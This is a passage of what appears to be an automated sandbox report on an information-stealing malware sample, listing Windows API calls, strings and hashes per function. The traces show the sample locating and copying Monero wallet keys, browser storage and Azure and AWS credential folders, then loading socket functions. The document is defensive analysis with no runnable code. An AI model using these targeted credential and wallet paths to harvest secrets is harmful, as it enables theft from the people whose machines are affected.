                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A219D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A21A8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A21D4
                          • lstrlen.KERNEL32(?), ref: 003A21EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A220A
                          • lstrcat.KERNEL32(00000000,?), ref: 003A2218
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2242
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A227F
                          • lstrlen.KERNEL32(00F2D6C0), ref: 003A228D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A22B1
                          • lstrcat.KERNEL32(00000000,00F2D6C0), ref: 003A22B9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A22F7
                          • lstrcat.KERNEL32(00000000), ref: 003A2304
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A232D
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003A2356
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2382
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A23BF
                          • DeleteFileA.KERNEL32(00000000), ref: 003A23F7
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003A2444
                          • FindClose.KERNEL32(00000000), ref: 003A2453
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                          • String ID:
                          • API String ID: 2857443207-0
                          • Opcode ID: 5cee297d182ac8fb88a9a05eb6812e2da2a547a5f027bd3446ab5ff7aa131827
                          • Instruction ID: f3b7003c534131d0299c3738a5fb9e93eb390a3b4a98cff990f7364bf460a4b2
                          • Opcode Fuzzy Hash: 5cee297d182ac8fb88a9a05eb6812e2da2a547a5f027bd3446ab5ff7aa131827
                          • Instruction Fuzzy Hash: F9E16231A112169BCB23EFA8DC89AAF77B9EF16300F054069F805EB661DB34DD15CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6445
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6480
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003B64AA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B64E1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6506
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B650E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6537
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FolderPathlstrcat
                          • String ID: \..\
                          • API String ID: 2938889746-4220915743
                          • Opcode ID: f8325f601e675c9511e7aa2f6a92792ade53b0fb05b98f70b456f31eae9ef82b
                          • Instruction ID: 3e6db2a3fb80d41cffc1ead37e701d5f81afd7705ffb6f6aa428e48007541c97
                          • Opcode Fuzzy Hash: f8325f601e675c9511e7aa2f6a92792ade53b0fb05b98f70b456f31eae9ef82b
                          • Instruction Fuzzy Hash: 36F19070E116169BCB23EF68D84AAAF77B4EF45304F05402AF945DBA52DB38DC45CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B43A3
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B43D6
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B43FE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B4409
                          • lstrlen.KERNEL32(\storage\default\), ref: 003B4414
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4431
                          • lstrcat.KERNEL32(00000000,\storage\default\), ref: 003B443D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4466
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B4471
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4498
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B44D7
                          • lstrcat.KERNEL32(00000000,?), ref: 003B44DF
                          • lstrlen.KERNEL32(003D1794), ref: 003B44EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4507
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B4513
                          • lstrlen.KERNEL32(.metadata-v2), ref: 003B451E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B453B
                          • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 003B4547
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B456E
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B45A0
                          • GetFileAttributesA.KERNEL32(00000000), ref: 003B45A7
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B4601
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B462A
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B4653
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B467B
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B46AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                          • String ID: .metadata-v2$\storage\default\
                          • API String ID: 1033685851-762053450
                          • Opcode ID: d65f5ba7f8c3bb910ca87a04accceac2b0925487b87bd858f64f7b7825a36b37
                          • Instruction ID: b9ade5a9cef3ff59e35e2c5314b83f2f6e22c56b5c0fc2f506f29a002fd2f0f3
                          • Opcode Fuzzy Hash: d65f5ba7f8c3bb910ca87a04accceac2b0925487b87bd858f64f7b7825a36b37
                          • Instruction Fuzzy Hash: E7B18D31A116169BCB23EFB8DD49AAF77A8EF11704F05002AF945DBA52EF30DC158B94
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B57D5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003B5804
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5835
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B585D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B5868
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5890
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B58C8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B58D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B58F8
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B592E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5956
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B5961
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5988
                          • lstrlen.KERNEL32(003D1794), ref: 003B599A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B59B9
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B59C5
                          • lstrlen.KERNEL32(00F2D690), ref: 003B59D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B59F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B5A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5A2C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5A58
                          • GetFileAttributesA.KERNEL32(00000000), ref: 003B5A5F
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B5AB7
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B5B2D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B5B56
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B5B89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5BB5
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B5BEF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B5C4C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5C70
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2428362635-0
                          • Opcode ID: 4dcae77073b445a59b1a1720c22893e2b0ab2744f98559686bbb793187563cc6
                          • Instruction ID: 5fcd4e5d0ee7856876fcf0a7f774ba3d1bf5b92f4b5a37cea2c0e89d8adb0c0b
                          • Opcode Fuzzy Hash: 4dcae77073b445a59b1a1720c22893e2b0ab2744f98559686bbb793187563cc6
                          • Instruction Fuzzy Hash: 6E02CD71A116169BCB23EFA8D889AEF7BB9EF14304F054129F905EBA50DB30DD45CB90
                          APIs
                            • Part of subcall function 003A1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003A1135
                            • Part of subcall function 003A1120: RtlAllocateHeap.NTDLL(00000000), ref: 003A113C
                            • Part of subcall function 003A1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 003A1159
                            • Part of subcall function 003A1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 003A1173
                            • Part of subcall function 003A1120: RegCloseKey.ADVAPI32(?), ref: 003A117D
                          • lstrcat.KERNEL32(?,00000000), ref: 003A11C0
                          • lstrlen.KERNEL32(?), ref: 003A11CD
                          • lstrcat.KERNEL32(?,.keys), ref: 003A11E8
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A121F
                          • lstrlen.KERNEL32(00F290B8), ref: 003A122D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1251
                          • lstrcat.KERNEL32(00000000,00F290B8), ref: 003A1259
                          • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 003A1264
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1288
                          • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 003A1294
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12BA
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A12FF
                          • lstrlen.KERNEL32(00F2D6C0), ref: 003A130E
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1335
                          • lstrcat.KERNEL32(00000000,?), ref: 003A133D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1378
                          • lstrcat.KERNEL32(00000000), ref: 003A1385
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A13AC
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 003A13D5
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1401
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A143D
                            • Part of subcall function 003BEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003BEE12
                          • DeleteFileA.KERNEL32(?), ref: 003A1471
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                          • String ID: .keys$\Monero\wallet.keys
                          • API String ID: 2881711868-3586502688
                          • Opcode ID: f480c061c6eca6ef14456b4f8ec999140a14f11f49729162505c1a71c71ff72a
                          • Instruction ID: e317f40fc05bf694060f6955051108f4d2cbe27ea45c20eca633185c8cb4458e
                          • Opcode Fuzzy Hash: f480c061c6eca6ef14456b4f8ec999140a14f11f49729162505c1a71c71ff72a
                          • Instruction Fuzzy Hash: C5A18171A112169BCB22EFB8DC49AAF77B9EF56300F054429F905EB251EB30DD05CB90
                          APIs
                          • memset.MSVCRT ref: 003BE740
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003BE769
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE79F
                          • lstrcat.KERNEL32(?,00000000), ref: 003BE7AD
                          • lstrcat.KERNEL32(?,\.azure\), ref: 003BE7C6
                          • memset.MSVCRT ref: 003BE805
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003BE82D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE85F
                          • lstrcat.KERNEL32(?,00000000), ref: 003BE86D
                          • lstrcat.KERNEL32(?,\.aws\), ref: 003BE886
                          • memset.MSVCRT ref: 003BE8C5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003BE8F1
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE920
                          • lstrcat.KERNEL32(?,00000000), ref: 003BE92E
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003BE947
                          • memset.MSVCRT ref: 003BE986
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$memset$FolderPathlstrcpy
                          • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 4067350539-3645552435
                          • Opcode ID: 1837f6f40b8795858a563648c7623096b03ccfb0ab2fd3835529639b7177ff56
                          • Instruction ID: 9125a81a3819a0f61de372e97a23d86847400d1a492a55dfc52d0aa945f2e69f
                          • Opcode Fuzzy Hash: 1837f6f40b8795858a563648c7623096b03ccfb0ab2fd3835529639b7177ff56
                          • Instruction Fuzzy Hash: 2171E771E50219ABDB26EB68DC46FEE7378EF58700F000899F7199B191EF709E488B54
                          APIs
                          • lstrcpy.KERNEL32 ref: 003BABCF
                          • lstrlen.KERNEL32(00F2EAD0), ref: 003BABE5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAC0D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003BAC18
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAC41
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAC84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003BAC8E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BACB7
                          • lstrlen.KERNEL32(003D4AD4), ref: 003BACD1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BACF3
                          • lstrcat.KERNEL32(00000000,003D4AD4), ref: 003BACFF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAD28
                          • lstrlen.KERNEL32(003D4AD4), ref: 003BAD3A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAD5C
                          • lstrcat.KERNEL32(00000000,003D4AD4), ref: 003BAD68
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAD91
                          • lstrlen.KERNEL32(00F2E998), ref: 003BADA7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BADCF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003BADDA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAE03
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BAE3F
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003BAE49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAE6F
                          • lstrlen.KERNEL32(00000000), ref: 003BAE85
                          • lstrcpy.KERNEL32(00000000,00F2E8D8), ref: 003BAEB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen
                          • String ID: f
                          • API String ID: 2762123234-1993550816
                          • Opcode ID: 4cf2f2e55f1d2a934c65604633b26119c44d89d2510d5dffe93093cf1bd74d5c
                          • Instruction ID: 20483dd49ebd2cf7674005d572d2315edcf21c325f0c311788bfe4551301b9c8
                          • Opcode Fuzzy Hash: 4cf2f2e55f1d2a934c65604633b26119c44d89d2510d5dffe93093cf1bd74d5c
                          • Instruction Fuzzy Hash: 4CB18E30A11A169BCB23EF68DC48AEFB7B5EF41705F05042AB911DBA61EB30DD15CB91
                          APIs
                          • LoadLibraryA.KERNEL32(ws2_32.dll,?,003B72A4), ref: 003C47E6
                          • GetProcAddress.KERNEL32(00000000,connect), ref: 003C47FC
                          • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 003C480D
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 003C481E
                          • GetProcAddress.KERNEL32(00000000,htons), ref: 003C482F
                          • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 003C4840
                          • GetProcAddress.KERNEL32(00000000,recv), ref: 003C4851
                          • GetProcAddress.KERNEL32(00000000,socket), ref: 003C4862
                          • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 003C4873
                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 003C4884
                          • GetProcAddress.KERNEL32(00000000,send), ref: 003C4895
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
